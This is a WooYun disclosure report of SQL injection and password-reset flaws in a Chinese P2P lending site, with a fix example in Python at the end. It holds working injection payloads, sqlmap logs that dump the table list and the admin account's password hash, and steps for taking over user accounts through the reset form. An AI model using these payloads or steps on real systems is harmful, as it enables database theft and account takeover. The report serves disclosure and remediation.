
Vulnerability summary

Defect ID: wooyun-2015-0142321

Vulnerability title: P2P lending platform 邦尼网 has SQL injection vulnerabilities that give access to the admin backend

Affected vendor: CNCERT (National Internet Emergency Center)

Vulnerability author: 路人甲

Submitted: 2015-09-24 00:16

Fixed: 2015-09-29 00:18

Disclosed: 2015-09-29 00:18

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Vulnerability status: Handed over to third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Vulnerability source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-09-24: Details sent to the vendor, awaiting vendor handling
2015-09-29: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

The P2B lending platform 邦尼网 has multiple SQL injection vulnerabilities that give access to the admin backend. Tested a few days ago; not submitted earlier because of network problems.

Detailed description:

Injection point 1:

http://**.**.**.**/index.php?c=article&a=type&tid=48


Test:

http://**.**.**.**/index.php?c=article&a=type&tid=48'


Returned:

SELECT pid FROM ld_classtype WHERE tid = '48'' ORDER BY tid LIMIT 1
执行错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''48'' ORDER BY tid LIMIT 1' at line 1


[Screenshot: 1.jpg]


Testing with sqlmap:

[00:51:25] [INFO] GET parameter 'tid' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[00:51:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:51:26] [INFO] GET parameter 'tid' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[00:51:26] [INFO] testing 'MySQL inline queries'
[00:51:26] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:51:26] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:51:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:51:56] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[00:51:58] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[00:52:01] [INFO] target URL appears to have 1 column in query
[00:52:31] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[00:52:31] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag T in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[00:53:03] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[00:53:34] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[00:54:05] [CRITICAL] connection timed out to the target URL or proxy
[00:54:35] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[00:55:06] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[00:55:37] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[00:56:08] [CRITICAL] connection timed out to the target URL or proxy
[00:56:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[00:56:38] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[00:57:09] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[00:57:40] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[00:58:11] [CRITICAL] connection timed out to the target URL or proxy
[00:58:41] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[00:59:12] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[00:59:43] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[01:00:14] [CRITICAL] connection timed out to the target URL or proxy
GET parameter 'tid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 361 HTTP(s) requests:
---
Place: GET
Parameter: tid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: c=article&a=type&tid=48' AND 7380=7380 AND 'RCOt'='RCOt
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: c=article&a=type&tid=48' AND (SELECT 6287 FROM(SELECT COUNT(*),CONCAT(0x71686f7a71,(SELECT (CASE WHEN (6287=6287) THEN 1 ELSE 0 END)),0x71676e7371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Svak'='Svak
---
---
[01:01:05] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
[01:01:49] [INFO] testing MySQL
[01:01:50] [WARNING] reflective value(s) found and filtering out
[01:01:50] [INFO] confirming MySQL
[01:01:51] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[01:01:51] [INFO] fetching current user
[01:01:52] [INFO] retrieved: 2bu@%
current user: '2bu@%'
[01:01:52] [INFO] fetching current database
[01:01:53] [INFO] retrieved: 2bu
current database: '2bu'
[01:01:53] [INFO] testing if current user is DBA
[01:01:53] [INFO] fetching current user
current user is DBA: False
[01:02:05] [INFO] testing MySQL
[01:02:05] [INFO] confirming MySQL
[01:02:05] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[01:02:05] [INFO] fetching database users
[01:02:06] [WARNING] reflective value(s) found and filtering out
[01:02:06] [INFO] the SQL query used returns 1 entries
[01:02:07] [INFO] retrieved: '2bu'@'%'
database management system users [1]:
[*] '2bu'@'%'
[01:02:32] [INFO] testing MySQL
[01:02:32] [INFO] confirming MySQL
[01:02:32] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[01:02:32] [INFO] fetching database names
[01:02:33] [WARNING] reflective value(s) found and filtering out
[01:02:33] [INFO] the SQL query used returns 2 entries
[01:02:33] [INFO] starting 2 threads
[01:02:34] [INFO] retrieved: 2bu
[01:02:34] [INFO] retrieved: information_schema
available databases [2]:
[*] 2bu
[*] information_schema
Database: 2bu
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| ld_city | 3408 |
| ld_classtype | 319 |
| ld_article | 187 |
| ld_article_field | 177 |
| ld_comment | 113 |
| ld_member | 71 |
| ld_onlinesq | 63 |
| ld_links | 48 |
| ld_admin_per | 44 |
| ld_fields | 27 |
| ld_ads | 23 |
| ld_message | 23 |
| ld_message_field | 23 |
| ld_sysconfig | 23 |
| ld_listen | 13 |
| ld_consumer_records | 9 |
| ld_adstype | 8 |
| ld_apply | 6 |
| ld_funs | 5 |
| ld_linkstype | 4 |
| ld_setting_sns | 4 |
| ld_traits | 4 |
| ld_molds | 3 |
| ld_payment | 3 |
| ld_labelcus | 2 |
| ld_login_talk | 2 |
| ld_logistics | 2 |
| ld_payment_record | 2 |
| ld_admin_group | 1 |
| ld_admin_user | 1 |
| ld_collection_node | 1 |
| ld_custom | 1 |
| ld_heed | 1 |
| ld_member_field | 1 |
| ld_member_group | 1 |
| ld_qqlogin | 1 |
| ld_share | 1 |
| ld_weibologin | 1 |
+---------------------+---------+
Database: 2bu
Table: ld_admin_user
[1 entry]
+-----+------+------+----------------------------------+-------+-------+-------+-------+------------+
| gid | auid | atel | apass                            | amail | auser | aname | level | pclasstype |
+-----+------+------+----------------------------------+-------+-------+-------+-------+------------+
| 1   | 1    | ??   | cb5e53a884c61397a153276cf7810a24 | ??    | admin | ????  | 1     | <blank>    |
+-----+------+------+----------------------------------+-------+-------+-------+-------+------------+


Backend address:

http://**.**.**.**/admin.php


The admin account obtained could be used to log into the backend, but the MD5 hash could not be cracked, so the backend was not actually entered.

Injection point 2:

http://**.**.**.**/index.php?c=message&a=type&tid=41


The tid parameter is injectable (already tested).
The problem is in the "Search answers" box under "Questions".
Test by searching for 1'
Returned:

select * from ld_message where isshow=1 and (title like '%1'%' or body like '%1'%') 
执行错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or body like '%1'%')' at line 1


Captured request:

http://**.**.**.**/index.php?c=apply&a=zixun (POST)
word=1


The word parameter is injectable.

[Screenshot: 2.jpg]


Direct sqlmap test:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: word
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: word=1%') AND 4702=4702 AND ('%'='
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: word=1%') AND (SELECT 5059 FROM(SELECT COUNT(*),CONCAT(0x71756f6571,(SELECT (CASE WHEN (5059=5059) THEN 1 ELSE 0 END)),0x716f786c71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('%'='
Type: UNION query
Title: MySQL UNION query (NULL) - 16 columns
Payload: word=1%') UNION ALL SELECT NULL,CONCAT(0x71756f6571,0x46685a614c5470734f65,0x716f786c71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: word=1%') AND SLEEP(5) AND ('%'='
---
[01:37:17] [INFO] testing MySQL
[01:37:20] [WARNING] automatically patching output having last char trimmed
[01:37:20] [INFO] confirming MySQL
[01:37:27] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[01:37:27] [INFO] fetching current user
current user: '2bu@%'
[01:37:31] [INFO] fetching current database
current database: '2bu'
[01:37:34] [INFO] testing if current user is DBA
[01:37:34] [INFO] fetching current user
[01:37:36] [WARNING] reflective value(s) found and filtering out
[01:37:36] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: False


Injection point 3:

http://**.**.**.**/index.php?c=apply&a=qingchu&jd=&lx=&zb=&nf=&fl=


Test:

http://**.**.**.**/index.php?c=apply&a=qingchu&jd='&lx='&zb='&nf='&fl='


Interestingly, adding ' to the jd parameter returns an error, yet also adding ' to the lx parameter makes the error disappear; how that happens becomes clear once you analyse the error message!~~~

select * from ld_article where pdqiye=1 and qyleixing=''' and qyzijin=''' and qynianfen=''' and qyjieduan=''' and qyfenlei=''' order by id desc limit 0,10
执行错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' order by id desc limit 0,10' at line 1


All five parameters are injectable: jd, lx, zb, nf and fl.

[Screenshot: 3.jpg]


sqlmap test results:

sqlmap identified the following injection points with a total of 327 HTTP(s) requests:
---
Place: GET
Parameter: jd
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: c=apply&a=qingchu&jd=' AND (SELECT 3247 FROM(SELECT COUNT(*),CONCAT(0x716d6e6f71,(SELECT (CASE WHEN (3247=3247) THEN 1 ELSE 0 END)),0x7162666d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ByiX'='ByiX&lx=&zb=&nf=&fl=
Place: GET
Parameter: zb
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: c=apply&a=qingchu&jd=&lx=&zb=' AND (SELECT 3569 FROM(SELECT COUNT(*),CONCAT(0x716d6e6f71,(SELECT (CASE WHEN (3569=3569) THEN 1 ELSE 0 END)),0x7162666d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yRdV'='yRdV&nf=&fl=
Place: GET
Parameter: fl
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: c=apply&a=qingchu&jd=&lx=&zb=&nf=&fl=' AND (SELECT 9160 FROM(SELECT COUNT(*),CONCAT(0x716d6e6f71,(SELECT (CASE WHEN (9160=9160) THEN 1 ELSE 0 END)),0x7162666d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QpTy'='QpTy
Place: GET
Parameter: lx
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: c=apply&a=qingchu&jd=&lx=' AND (SELECT 7715 FROM(SELECT COUNT(*),CONCAT(0x716d6e6f71,(SELECT (CASE WHEN (7715=7715) THEN 1 ELSE 0 END)),0x7162666d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eFUe'='eFUe&zb=&nf=&fl=
Place: GET
Parameter: nf
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: c=apply&a=qingchu&jd=&lx=&zb=&nf=' AND (SELECT 6328 FROM(SELECT COUNT(*),CONCAT(0x716d6e6f71,(SELECT (CASE WHEN (6328=6328) THEN 1 ELSE 0 END)),0x7162666d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'BQZl'='BQZl&fl=
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: jd, type: Single quoted string (default)
[1] place: GET, parameter: lx, type: Single quoted string
[2] place: GET, parameter: zb, type: Single quoted string
[3] place: GET, parameter: nf, type: Single quoted string
[4] place: GET, parameter: fl, type: Single quoted string
[q] Quit
> 0
[01:54:34] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
[01:54:34] [INFO] fetching current user
[01:54:35] [INFO] retrieved: 2bu@%
current user: '2bu@%'
[01:54:35] [INFO] fetching current database
[01:54:36] [INFO] retrieved: 2bu
current database: '2bu'
[01:54:36] [INFO] testing if current user is DBA
[01:54:36] [INFO] fetching current user
current user is DBA: False


Injection point 4:

http://**.**.**.**/index.php?c=apply&a=zhaomima1


Enter admin' in the account name field.
The error returned:

select * from ld_member where user='admin''
执行错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin''' at line 1


Capture the request to get the POST data:

http://**.**.**.**/index.php?c=apply&a=zhaomima2 (POST)
username=admin


The username parameter is injectable.

[Screenshot: 4.jpg]


Testing with sqlmap:

POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 57 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: username=admin' AND (SELECT 5188 FROM(SELECT COUNT(*),CONCAT(0x7179666c71,(SELECT (CASE WHEN (5188=5188) THEN 1 ELSE 0 END)),0x716a716f71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'IOwP'='IOwP
Type: UNION query
Title: MySQL UNION query (NULL) - 42 columns
Payload: username=admin' UNION ALL SELECT CONCAT(0x7179666c71,0x614f4649524b46794847,0x716a716f71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
[02:11:06] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
[02:11:06] [INFO] fetching current user
current user: '2bu@%'
[02:11:07] [INFO] fetching current database
current database: '2bu'
[02:11:09] [INFO] testing if current user is DBA
[02:11:09] [INFO] fetching current user
[02:11:10] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: False


5. Weak validation makes it possible to obtain user information:

http://**.**.**.**/index.php?c=apply&a=zhaomima1


Here we can capture the request and test it with a large list of usernames to find which ones exist, e.g. boxerking (taken from the user information obtained above, so there is no need to run through the user table with Burp Suite).
After entering a valid username:

http://**.**.**.**/index.php?c=apply&a=zhaomima2


We enter some arbitrary digits and the page says the email is incorrect; looking at the captured traffic, the returned data is:

http://**.**.**.**/index.php?c=apply&a=zhaomima3 (POST)
user_name=boxerking&user_email=188777830@**.**.**.**&email=111


So, using the captured email address, the user's password can be changed!~~~

Proof of vulnerability:

Fix recommendation:

Fix by filtering input!~~~
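The report's suggested fix is input filtering; the change that actually removes this class of bug is to stop building SQL text out of request parameters. The following is an added example, not code from the report or from the platform: it uses Python with an in-memory SQLite stand-in (constructed tables named after ld_classtype and ld_message from the error messages above) to reproduce the quote-induced syntax error for the tid and word parameters next to parameterised versions, including the LIKE-wildcard escaping the search query additionally needs.

```python
import sqlite3

# Constructed stand-in for the ld_classtype and ld_message tables named in the report's error messages.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE ld_classtype (tid INTEGER, pid INTEGER);
        INSERT INTO ld_classtype VALUES (48, 7), (49, 7);
        CREATE TABLE ld_message (id INTEGER, isshow INTEGER, title TEXT, body TEXT);
        INSERT INTO ld_message VALUES (1, 1, 'withdraw 100%', 'steps'),
                                      (2, 1, 'interest', 'about 1 year'),
                                      (3, 0, 'hidden', 'isshow=0, never searchable');
    """)
    return db

def vulnerable_type_lookup(db, tid):
    # Same construction as the failing query in the report: the raw value is pasted into the SQL
    # text, so tid="48'" closes the literal early and the statement no longer parses.
    sql = "SELECT pid FROM ld_classtype WHERE tid = '%s' ORDER BY tid LIMIT 1" % tid
    try:
        return db.execute(sql).fetchone()
    except sqlite3.OperationalError as e:
        return "SQL error: %s" % e

def vulnerable_search(db, word):
    # Mirrors the "Search answers" query: the quote in word="1'" breaks the LIKE pattern.
    sql = ("SELECT id FROM ld_message WHERE isshow = 1 "
           "AND (title LIKE '%%%s%%' OR body LIKE '%%%s%%')" % (word, word))
    try:
        return [r[0] for r in db.execute(sql)]
    except sqlite3.OperationalError as e:
        return "SQL error: %s" % e

def safe_type_lookup(db, tid):
    # Parameterised: the value travels separately from the SQL text, so a quote cannot end the literal.
    return db.execute("SELECT pid FROM ld_classtype WHERE tid = ? ORDER BY tid LIMIT 1", (tid,)).fetchone()

def escape_like(s, esc="\\"):
    # A bound parameter stops injection, but %, _ and the escape character are still LIKE
    # wildcards inside the value, so escape them before wrapping the pattern in %...%.
    return s.replace(esc, esc + esc).replace("%", esc + "%").replace("_", esc + "_")

def safe_search(db, word):
    pattern = "%" + escape_like(word) + "%"
    sql = ("SELECT id FROM ld_message WHERE isshow = 1 "
           "AND (title LIKE ? ESCAPE '\\' OR body LIKE ? ESCAPE '\\')")
    return [r[0] for r in db.execute(sql, (pattern, pattern))]
```

With the parameterised versions, "48'" and "1'" are simply values that match nothing, and a search for "%" matches only rows containing a literal percent sign instead of every visible row.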

Copyright notice: please credit 路人甲@乌云 when reposting


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-09-29 00:18

Vendor reply:

Vulnerability Rank: 4 (WooYun assessment)

Latest status:

None yet